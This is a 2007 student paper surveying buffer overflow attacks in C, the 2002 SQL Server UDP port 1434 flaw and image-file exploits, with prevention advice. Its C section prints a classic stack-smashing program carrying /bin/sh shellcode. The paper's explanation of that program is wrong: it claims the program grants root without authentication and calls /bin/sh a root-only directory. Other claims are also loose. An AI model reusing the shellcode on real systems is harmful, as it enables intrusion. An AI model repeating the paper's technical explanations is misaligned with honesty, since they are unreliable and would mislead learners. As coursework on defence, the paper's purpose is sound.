buffer overflow: a short study

Buffer Overflow: A Short Study

Jonathan Hutchison

Robert Lee

Connor Mahoney

Caleb Wherry

Information Security

Mrs. Nancy Smithfield

November 13, 2007

GroupA1

Buffer overflow is a serious problem in the computer world today. It poses a serious

threat to any piece of code out there and has the potential for great damage on any system, no

matter the operating system or manufacturer. Buffer overflow takes seemingly harmless code

and uses large amounts of information pushed into this code to make a machine do things it

normally would not do. This method of attack accounts for around 50% of all malicious attacks

that take place currently in the computer world. There is not one area of computers that is totally

immune to a buffer overflow attack. It is prevalent in C/C++, SQL, JAVA, and even in data

image processing. Malicious code can be hidden in images and when the image is opened up, the

code is executed in the back ground. This can cause serious damage to someone’s computer in

many ways. Buffers can be easily accessed while the person at the computer is unaware of what

is going on making it incredible hard to stop one of these attacks. These all are ways to cause

damage through buffer overflows. We will discuss some of these dangers and how they can be

prevented and what the future holds for each of them.

When looking at buffer overflows, one of the largest areas that seem to pertain to them is

that of the programming languages of C and C++. These languages’ use of arrays and vectors

make it easy to cause a buffer overflow and do some serious damage. But before we get into the

technical specifications of a buffer overflow attack in C and C++, lets first define what buffer

overflow really is. Buffer overflow is the use of code to fill up a computer buffer to the point

where it cannot fit in the buffer any more so it flows over into other parts of memory. But what is

a buffer, you ask. A buffer is a temporary memory storage area comparable to cache memory. It

stores input from the keyboard or information that is being currently populated in a running

program. This is where the first steps of a buffer overflow attack starts, with the basic knowledge

GroupA2

of how the computer buffers actually work. Since C and C++ are two the most vulnerable

languages out there at the moment, we will look at ways to create buffer overflow in these

languages. With these languages, there are many ways of going about causing damage with the

buffer but we will look specifically at the case of stack-based buffer overflows. A stack is a type

of memory storage that has certain characteristics. Stack has the distinctive feature of having a

“First-In-Last-Out” memory allocation algorithm. We will look at this type, as opposed to heap-

based buffer overflows, because it is much easier to understand and code. Take this C code

example:

#include <stdio.h>

#include <string.h>

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh"; // Shell code that will be executed once the buffer is // over flown. It allows us to change the stance of our // login to “root”.

char large_string[128];

int main(int argc, char *argv[])

{

char buffer[96]; // buffer to overflow

int i;

long *long_ptr = (long *)large_string;

GroupA3

for (i = 0; i < 32; i++) // These for loops take the shell code and // translate it into the large string and then // in turn puts a full buffer into each // pointer value of the large_string

*(long_ptr + i) = (int)buffer;

for (i = 0; i < (int)strlen(shellcode); i++)

large_string[i] = shellcode[i];

strcpy(buffer, large_string); // The string copy function in C should be used // with the utmost caution. This is where the code // blows up and causes the program to execute the // rest of the shell code on the command line.

return 0;

}

This code, when run from an unsecured Linux system, causes the user to automatically

switch to the root user without any type of authentication at all! To really understand why this

does what it does, you have to first understand that many statements in C and C++ are extremely

risky to use, such as the “strcpy()” function. There is no automatic checking system in this

command, or for that matter arrays as well, that makes sure that the operation it is doing it within

the set limit of space it was allocated at the beginning of the program. This is where the

knowledge of the buffer can really help someone to cause a lot of damage. The simple shell code

declared at the beginning of the code is sent directly to the command prompt because the buffer

variable is already full. The shell code then gets executed, thus causes the users to switch to the

root user. When looking at the shell code, there are many different directories that the shell code

is referencing. Once the shell code is executed, it finds the directory “/bin/sh” and grants control

to that user on that system. Since the only user that has access to that directory is the root user,

control is switched to full root privileges. The root user has full control of everything on the

GroupA4

Linux system. Once a person has access to the root account they can do anything they want on

the system. They have full rights to anything and everything. Just by executing this simple C

code they can gain full access to a Linux system within a few minutes. Preventing these kinds of

attacks is the next topic of interest for us in this study.

Preventing buffer overflow attacks is almost as easy as doing a buffer overflow attack.

First and foremost, use trusted libraries when running code. Do not use random libraries for your

code because you have no clue what is really going on when you make a function call out of that

library. Another thing that goes along with this is the use of good programming techniques as a

programmer. Do not write code that is going to be susceptible to overflow attacks. Make sure all

data coming from user is in the right format and is within the limit of the scope of the program or

variable. Letting a user input as much information as they want is a sure way to open your

system up to buffer overflow attacks. Also test the software before it is released. Do not release

alpha versions of software without knowing good and well that the code is safe. As the above

example shows, a simple C program can cause much havoc on a Linux system. Test the

programs and make sure all data going in and out is being properly tested. A software developer

should also use readily available programs such as Flawfinder and Viega’s RATS to overlook

their source code for possible weaknesses where an attack could happen. On the front end these

tasks may seem pointless and costly, but in the long run they help. One of the main causes for

software failure due to buffer overflow is the ineptitude of the programmers behind the software.

Time constraints and money bonuses get in the way of the real objective of a software product.

Steps are skipped in the writing of code, no one makes a note of it, and no one ever goes back

and fixes the issues, thus causing potential threats to people who use the software.

GroupA5

Best Practices for Prevention of Buffer Overflow In Code

Use trusted libraries when including them in projects.

Use buffer overflow prevention software to scan code to check for potential trouble spots.

Use trusted releases of programs. Alpha and Beta versions have bugs that tend to not prevent buffer overflow.

Check user input for validity and make sure it is in the correct format and within range of function.

Use trusted functions within trusted libraries.

Know what you are using!

The next big area of interest in buffer overflow is that in SQL (Structured Query

Language). SQL is used in the development of software databases and is widely used with online

database systems as well. These two combined make a huge market for exploits in SQL to cause

buffer overflows. These attacks are done by inputting commands that exceed the space of the

variable assigned to take the input stream. The system can then be attacked by overwriting data

in order to execute malicious code or just cause corruption of data. For example, in 2002 an

advisory was issued by NGS Software Insight Security Research describing remote buffer

overrun vulnerability in Microsoft SQL Server 2000. Both stack based and heap based overflow

vulnerabilities existed, allowing a hacker to execute code of his or her choice without ever

needing to authenticate with the server. In each case, the security vulnerabilities in question

occurred through UDP port 1434, the Microsoft SQL monitor port. This port is routinely used by

legitimate clients in order to establish a connection to the server. UDP, or “User Datagram

Protocol”, is a connection-less communications protocol operating on the transport layer. Unlike

TCP, UDP does not need to establish a connection to function. This makes it faster than TCP, but

GroupA6

easier to spoof. This, combined with the stateless nature of UDP, also makes it easy to bypass

firewalls by appearing to look like legitimate traffic.Ordinarily, traffic through this port will

contain a certain byte that lets the SQL monitor know that a client is trying to dynamically

discover how to connect to the server. However, other instructions can be sent through this port.

For instance, if a hacker wanted to execute a stack based overflow vulnerability, the first byte of

the packet can be set to 0x04, which tells the SQL Monitor to open a registry key using the

remaining data supplied in the packet. If this is followed by a large number of bytes, an overflow

occurs and the stack, including the saved return address, is overwritten. The hacker can include a

new return address and when the current process is finished the processor will go there instead

and begin executing the malicious code.A heap based overflow attack can also be carried out

using a similar process. If the data appended to a packet is formatted a certain way, it can

overflow the heap based buffer and exploit a vulnerability in SQL server in which return values

are not validated before being passed to the next function. The result is a corrupted heap

structure which has the effect of a denial of service attack.When this vulnerability was

discovered in 2002, there wasn’t much that could be done to eliminate the risk until Microsoft

was able to create a patch. The risk could be reduced, however, by following best practices and

adding additional rules to the firewall to help filter out packets destined for port 1434 that, while

ordinarily may look legitimate, shouldn’t be destined for that port. An example would be a DNS

query response. Microsoft rated these particular threats as critical, and a patch was released in

2003.

The last type of buffer overflow that we are going to be dealing with is that which deals

with Steganography. Steganography is the act of hiding messages where they will not be

GroupA7

detected. The modern use of this concept has been hiding information in image or video files.

However, messages aren’t the only things that can be hidden in digital images. Buffer overflows

can occur in almost any unprotected area. While it may usually carry its payload in malicious

programs, several image formats are vulnerable to this type of exploit, as well. When a

computer attempts to display the image, the code is unknowingly inserted into the machine’s

memory via a buffer overflow attack. Steganography can be used in both traditional and digital

images, although it is much harder to detect in digital pictures. One use of this has caused

controversy among privacy groups. Many laser printer manufacturers have begun printing tiny

yellow dots into images. These yellow dots are unique to each printer, and are embedded into

every document printed. Their orientation is unique to indicate the printer model, manufacturer,

and serial number. The government originally asked manufacturers to include these dots as a

way to track counterfeit bills, and many companies have complied.

A view of dots printed under a blue LED.(http://w2.eff.org/Privacy/printers/docucolor/)

GroupA8

This “traditional” form of steganography is considered easier, as it can be seen by anyone

looking in the correct place with a microscope. However, digital steganography is much harder

to detect. One reason for this is because of the amount of data contained by a digital photograph.

If a small message were embedded in a high-resolution photograph, it would be nearly

impossible to detect unless the exact location of the message was known in the data. For

instance, in a 24-bit image, each pixel totals 24 bits (8 bits for red, green, and blue). That leaves

256 shades of each color, for each pixel. If someone wanted to write a message using only the

last bit for every color, they would only need to modify 3 pixels for every letter. One shade of

difference per color, per pixel, would be almost unperceivable by the human eye, even if one

were comparing it with the original side by side. Text isn’t the only data that can be hidden using

digital steganography. It is even possible to hide a lower resolution image inside of a higher-

resolution image, with almost no perceived difference in the original image. Using this

technique, it may even be possible to “hide” a video inside of another video, if one were to know

how to extract the data. Despite the possibilities with steganography, the real security issues are

related to buffer overflows in images. Many major systems and image files have been exploited.

For windows, there are exploits for formats such as Jpeg, Bitmap, and Gif files. For Linux, there

was a hole found in the Portable Network Graphics format (PNG). However, the most recent

example has been a TIFF exploit in both the PlayStation Portable game system, and the Apple

iPhone.

The Apple iPhone is a closed system. While it has a fully functioning operating system,

it is limited to only Apple applications. However, a group of programmers found a way to get

around this. By visiting a website on the iPhone, http://www.jailbreakme.com/, the phone would

GroupA9

download a TIFF image file. The image had code embedded into it. This code crashes the

internet browser, and overwrites part of the file system. Once this occurs, the user is free to

install any compatible application they like. Buffer overflows in images generally all work in the

same way. The program opening the image expects it to be a certain size, and allocates memory

for that size. However, it is possible to trick the program by way of an altered file header, or by

altering the structure of an image. When the image is loaded, it unexpectedly overfills the

buffer, and keeps writing data into the next block of physical memory. If crafted correctly, a

pointer to more memory locations can be written to this block, allowing a program to be

executed, or further code to be written.

There are several ways to protect a computer from a buffer overflow attack in an image.

The most secure would be to disable loading of images in the web browser, and only open

pictures from trusted sources. This, however, is not practical. Another way is to periodically

check for updates and patches for these vulnerabilities, such as Microsoft Update’s GDI+

vulnerability patch that affected jpegs in Windows operating systems. A third and easiest

approach is to simply be on the lookout. Don’t visit “shady” websites, or anywhere else that

may wish to infect your computer. In conclusion, images and videos can be used for many

purposes that were not originally intended. They can carry hidden messages without being

detected, or contain embedded code. This code can be used to simply crash a system, or

overwrite memory to execute malicious code. To prevent this, always use the latest patches and

security tips for your computers and digital devices.

Buffer overflow is a major problem in the world of computers as we know it. Someone

can easily take over a whole computer network by using buffer overflow to gain access to private

GroupA10

accounts, destroy valuable information by getting into an SQL database, or just mess around with

things by using this well known type of exploit. With the speed of computer doubling almost 2

fold every 18 months, buffer overflows are always going to be prevalent. Technology is

advancing so fast that the “minor” problems go overlooked. The business world of computers

today is more worried about how fast the machine will run and how much they can make off of

the system. A simple unallocated array in one line of 50 million lines of code doesn’t mean

anything to a lot of people anymore. Software deadlines and the promise of extra money drives

programmers to put out less than perfect software. As long as this is the case, buffer overflow

will always be a problem with code. A software developer that cuts corners because of deadlines

is almost certainly going to have trouble down the road with their code. A good hacker can find

vulnerabilities in any system, no matter how small it may seem. All they need is one small hole

and they are in. Buffer overflow attacks will become more and more troublesome as the

technological world leans for towards marketability instead of user satisfaction.

GroupA11

Works Cited

“Buffer Overruns in SQL Server 2000.” Microsoft Security. 24 July 2002.

<http://www.microsoft.com/technet/security>

Cobb, Michael. “How Buffer-overflow Vulnerabilities Occur.” Search Security. 12 December

2005. < http://searchsecurity.techtarget.com>

Fayolle, Pierre-Alain. “A Buffer Overflow Study: Attacks & Defense.” Network & Distributed

Systems. 2002.

Ghost_Rider. “Introduction to Buffer Overflow.” <http://www.governmentsecurity.org>

“Grover, Sandeep. “Buffer Overflow Attacks & Their Countermeasures.” Linux Journal. 10

March 2003. <http://www.linuxjournal.com/article/6701>

Kharrazi, Mehdi. “Image Steganography: Concepts and Practice.” 22 April 2004.

Ogorkiewicz, Maciej. “Analysis of Buffer Overflow Attacks.” Windows Security. 23 July 2003.

<http://www.windowsecurity.com>

“Unauthenticated Remote Compromise in MS SQL Server 2000.” 25 July 2002.

< http://www.nextgenss.com/advisories/mssql-udp.txt>

buffer overflow: a short study

Documents

buffer overflow attack

isa buffer

groupa1 buffer overflow

char buffer96 buffer

use of code

malicious code

piece of code

heapbased buffer overflows